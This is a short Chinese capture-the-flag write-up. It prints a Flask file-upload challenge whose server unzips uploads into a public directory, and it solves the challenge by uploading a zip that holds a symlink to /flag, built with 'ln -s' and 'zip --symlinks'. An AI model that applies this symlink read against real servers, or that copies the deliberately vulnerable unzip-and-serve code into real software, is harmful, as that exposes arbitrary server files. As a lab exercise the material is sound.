题目描述
解题过程
下载源码
import osimport jsonfrom shutil import copyfilefrom flask import Flask,request,render_template,url_for,send_from_directory,make_response,redirectfrom werkzeug.middleware.proxy_fix import ProxyFixfrom flask import jsonifyfrom hashlib import md5import signalfrom http.server import HTTPServer, SimpleHTTPRequestHandleros.environ['TEMP']='/dev/shm'app = Flask("access")app.wsgi_app = ProxyFix(app.wsgi_app, x_for=1 ,x_proto=1)@app.route('/',methods=['POST', 'GET'])def index():if request.method == 'POST':f=request.files['file']os.system("rm -rf /dev/shm/zip/media/*")path=os.path.join("/dev/shm/zip/media",'tmp.zip')f.save(path)os.system('timeout -k 1 3 unzip /dev/shm/zip/media/tmp.zip -d /dev/shm/zip/media/')os.system('rm /dev/shm/zip/media/tmp.zip')return redirect('/media/')response = render_template('index.html')return response@app.route('/media/',methods=['GET'])@app.route('/media',methods=['GET'])@app.route('/media/<path>',methods=['GET'])def media(path=""):npath=os.path.join("/dev/shm/zip/media",path)if not os.path.exists(npath):return make_response("404",404)if not os.path.isdir(npath):f=open(npath,'rb')response = make_response(f.read())response.headers['Content-Type'] = 'application/octet-stream'return responseelse:fn=os.listdir(npath)fn=[".."]+fnf=open("templates/template.html")x=f.read()f.close()ret="<h1>文件列表:</h1><br><hr>"for i in fn:tpath=os.path.join('/media/',path,i)ret+="<a href='"+tpath+"'>"+i+"</a><br>"x=x.replace("HTMLTEXT",ret)return xos.system('mkdir /dev/shm/zip')os.system('mkdir /dev/shm/zip/media')app.run(host="0.0.0.0",port=8080,debug=False,threaded=True)
本地调试Web程序
知道Flag的位置,可以使用ln软链接来获取Flag
ln -s /flag flagzip --symlinks flag.zip ./*
上传链接后的 flag.zip, 会在页面下解压 flag文件指向根目录下的 flag
若有收获,就点个赞吧
0 人点赞
